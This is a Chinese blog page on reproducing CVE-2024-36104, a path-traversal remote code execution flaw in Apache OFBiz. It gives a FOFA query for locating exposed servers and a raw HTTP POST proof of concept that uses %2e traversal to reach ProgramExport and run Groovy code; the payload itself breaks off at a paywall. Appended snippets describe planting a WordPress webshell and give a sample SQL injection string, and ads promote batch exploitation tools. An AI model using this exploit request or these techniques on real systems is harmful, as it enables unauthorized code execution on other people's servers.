CVE-2024-36104 Apache OFBiz路径遍历RCE漏洞复现(附POC)

最新推荐文章于 2025-03-31 15:03:26 发布
最新推荐文章于 2025-03-31 15:03:26 发布
阅读量2k 收藏 5
点赞数 6
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mashiro_hibiki/article/details/139480964
版权

漏洞描述

Apache_OFBiz是一套基于通用架构的企业应用程序,使用通用数据,逻辑和流程组件。 应用程序的松散耦合特性使这些组件易于理解,扩展和定制。

由于对HTTP请求URL中的特殊字符(如;、%2e)限制不当,威胁者可构造恶意请求利用该漏洞,成功利用可能导致远程代码执行。

影响版本

Apache OFBiz < 18.12.14

FOFA

app="Apache_OFBiz"

POC

POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

groovyProgram=\u0074\u00
最低0.47元/天 解锁文章
CatalyzeSec
关注
Apache OFBiz 路径遍历导致RCE漏洞复现CVE-2024-36104
0xSec
06-04 2523
Apache OFBiz 18.12.14之前版本存在命令执行漏洞,该漏洞源于org.apache.ofbiz.webapp.control.ControlFilter类对路径(请求URL中的特殊字符(如 ;、%2e)限制不当导致攻击者能够绕过后台功能点的过滤器验证,并通过/webtools/control/ProgramExport接口的编程导出功能执行任意Groovy代码获取系统权限。
Check Point 安全网关任意文件读取漏洞复现(CVE-2024-24919)
0xSec
05-30 1182
Check Point Security Gateways 任意文件读取漏洞(CVE-2024-24919)存在在野利用,远程攻击者可以通过构造恶意请求读取服务器上的任意文件,造成敏感信息的泄漏。目前,此漏洞已检测到在野利用。鉴于该漏洞影响范围较大,建议客户尽快做好自查及防护。
Apache OFBiz路径遍历漏洞(CVE-2024-36104)
WuYSec的博客
06-05 603
Apache OFBiz 18.12.14之前版本存在命令执行漏洞 ,该漏洞源于ControlFilter对路径限制不当导致用户能够访问ProgramExport导出功能执行Groovy代码。Apache OFBiz是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。无垠Sec专注安全研究,包括但不限于代码审计、漏洞挖掘、思路分享等。目前仅需50,你就能得到常见系统1day漏洞POC、代码审计、漏洞分析、漏洞挖掘等。
红队信息收集思路总结
Hacker0830的博客
04-17 1559
渗透测试的本质就是信息收集,信息搜集的广度决定了攻击的广度,知识面的广度决定了攻击的深度。信息收集很重要,如确定资产,比如他有哪些域名、子域名、C 段、旁站、系统、微信小程序或者公众号,确定好站点或者目标系统之后,就是常规的指纹识别,像中间件、网站,扫目录,后台,确定功能然后分析每个功能点上会有哪些漏洞,就比如一个登录页面,我们可以考虑的是爆破账号密码,社工账号密码,SQL 注入,XSS 漏洞,逻辑漏洞绕过等。
Catalyze安全知识库
mashiro_hibiki的博客
05-21 426
高质量安全知识星球社区,致力于漏洞挖掘,渗透技巧,安全资料,星球承诺会持续更新0/1/NDay及对应的批量利用工具,团队内部漏洞库,内外网攻防技巧,你所需要的各类安全工具和资料以及团队师傅们最新的学习研究成果。分享行业内最新动态,解答交流各类技术问题。涉及方向包括Web渗透、免杀绕过、红蓝攻防、代码审计、应急响应、安全培训、CTF、小白入门、职业规划和疑难解答。
Goby 漏洞发布|CheckPoint Gateway /clients/MyCRL 文件读取漏洞CVE-2024-24919)
m0_46699477的博客
05-30 1005
CheckPoint Gateway 是 CheckPoint 软件技术公司开发的一种网络安全设备,主要用于保护网络基础设施免受各种网络威胁。CheckPoint Gateway /clients/MyCRL 路径下存在文件读取漏洞,攻击者可构造恶意请求遍历读取系统上的文件,造成敏感信息泄漏。
Wordpress漏洞复现
热门推荐
weixin_52194536的博客
09-10 1万+
cms漏洞
wordpress漏洞复现
cheapkiller的博客
08-03 507
点击【外观】——>【编辑】选择404.php并将文件改为我们的一句话木马。然后我们访问刚刚修改的文件内容说明我们注入成功就可以了。
Apache OFBiz 远程代码执行漏洞复现(CVE-2024-45195)
0xSec
09-06 1416
2024年9月,互联网上披露了Apache OFBiz 远程代码执行漏洞(CVE-2024-45195),该漏洞允许未经身份验证的远程攻击者通过SSRF漏洞控制请求从而写入恶意文件。攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。
Apache OFBiz 未授权远程代码执行漏洞CVE-2024-45195)
iSee857的博客
09-08 1181
Apache OFBiz是⼀个著名的电⼦商务平台,提供了创建基于最新 J2EE/ XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应⽤服务器的多层、分布式电⼦商务类WEB应⽤系统的框架。Apache OFBiz 18.12.16 之前版本中,由于Web 应用程序中缺少视图授权检查,未经身份验证的远程威胁者可构造恶意请求写入恶意文件导致远程代码执行,从而获取服务器权限。在服务器上启动一个python http服务用以 请求发送。服务器上启的http服务收到访问链接。访问下列接口进行RCE验证。
Apache OFBiz 授权不当致远程代码执行漏洞(CVE-2024-38856)
0xSec
08-05 1374
2024年8月,互联网上披露Apache OFBiz 授权不当致远程代码执行漏洞(CVE-2024-38856),该漏洞允许未经过身份验证的远程攻击者绕过原有通过特定URL绕过检测执行恶意代码的安全机制。攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。
WordPress--漏洞复现
Jz031212的博客
08-04 775
4.访问这个文件显示出phpinfo证明注入成功。1.搭建好环境进入后台登录界面登录管理员。2.进入后选择外观---编辑。3.将文件内容改为我们的。
WolrdPress漏洞复现
m0_47968686的博客
01-05 884
靶机Web Developer渗透 实验步骤和内容: 目的:获取靶机Web Developer 文件/root/flag.txt中flag。 基本思路:本网段IP地址存活扫描(netdiscover);网络扫描(Nmap);浏览HTTP 服务;网站目录枚举(Dirb);发现数据包文件 “cap”;分析 “cap” 文件,找到网站管理后台账号密码;插件利用(有漏洞);利用漏洞获得服务器账号密码;SSH 远程登录服务器;tcpdump另类应用。 主机发现 使用nmap -s机 192.168.131.0/24扫
WordPress AutomaticPlugin SSRF漏洞复现(CVE-2024-27954)
0xSec
03-31 830
WordPress AutomaticPlugin 其插件wp_automatic易受未经验证的任意文件下载和SSRF的攻击。位于downloader.php文件中,可能允许攻击者从网站下载任何文件。敏感数据,包括登录凭据和备份文件等。
墨者学院-WordPress 远程命令执行漏洞(CVE-2018-15877)复现
ploto_cs的博客
10-08 713
1.访问目标网站 2.使用御剑对域名进行探测 常用HTTP响应码: 200一交易成功 302一跳转 400一错误请求 403一禁止访问 404一未发现目标 500一内部服务器错误 3.发现存在登录的网址 网址:http://219.153.49.228:46188/wp-admin/ 4.使用BP对网站后台账户密码进行爆破 通过使用暴力破解可以得到 User:admin Password:123qwe 5.登录后台 因为是Activity Monitor插件远程命令执行漏洞 Activity Mon
wordpress 4.6任意命令执行漏洞(PwnScriptum)复现
永远是少年
12-31 2059
今天继续给大家介绍渗透测试相关知识,本文主要内容是wordpress 4.6任意命令执行漏洞(PwnScriptum)复现。 一、wordpress 4.6任意命令执行漏洞(PwnScriptum)简介与靶场搭建 二、wordpress 4.6任意命令执行漏洞(PwnScriptum)复现
WordPress 未授权本地文件包含漏洞复现CVE-2025-2294)(脚本)
最新发布
iSee857的博客
03-31 315
适用于 WordPress 的 Kubio AI Page Builder 插件在 2.5.1 之前的所有版本中都容易受到本地文件包含thekubio_hybrid_theme_load_template 的攻击。这使得未经身份验证的攻击者可以在服务器上包含和执行任意文件,从而允许执行这些文件中的任何 PHP 代码。这可用于绕过访问控制、获取敏感数据,或在可以上传和包含图像和其他“安全”文件类型的情况下实现代码执行。(CVE-2025-2294)
cve-2024
03-12
### CVE-2024系列安全漏洞详情 #### VMware vCenter 高危漏洞 (CVE-2024-38812, CVE-2024-38813) VMware vCenter Server 和 VMware Cloud Foundation 存在两个新的高危漏洞,分别是 CVE-2024-38812 和 CVE-2024-38813。这些漏洞涉及堆溢出和权限提升问题,CVSS评分为9.8,表明其具有极高的风险等级[^1]。 对于受影响的产品版本: - **vCenter Server**: 版本 7.x 及更早版本受到影响。 - **Cloud Foundation**: 同样适用于相同的主要版本及其之前的次要更新。 攻击者可能利用这两个漏洞执行远程代码或获得更高权限的操作环境,从而完全控制目标系统。 ```bash # 检查当前安装的vCenter版本号 vmware-vmon-cli --version ``` #### 网康科技 NS-ASG 应用安全网关 SQL 注入漏洞 (CVE-2024-3458, CVE-2024-3457, CVE-2024-3456) 针对网康科技发布的多个SQL注入漏洞公告,具体编号为 CVE-2024-3458、CVE-2024-3457 和 CVE-2024-3456。这些问题存在于NS-ASG设备中,允许未经身份验证的用户通过特定参数提交恶意输入来操纵数据库查询语句,进而读取敏感数据或者修改配置设置等操作[^2]。 影响范围涵盖了所有运行上述固件版本的应用安全网关产品线,并且由于该类产品广泛应用于企业内部网络边界防护场景下,因此潜在危害较大。 ```sql -- 示例:如何检测是否存在SQL注入点(仅用于合法测试) SELECT * FROM users WHERE id = '1' OR '1'='1'; ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值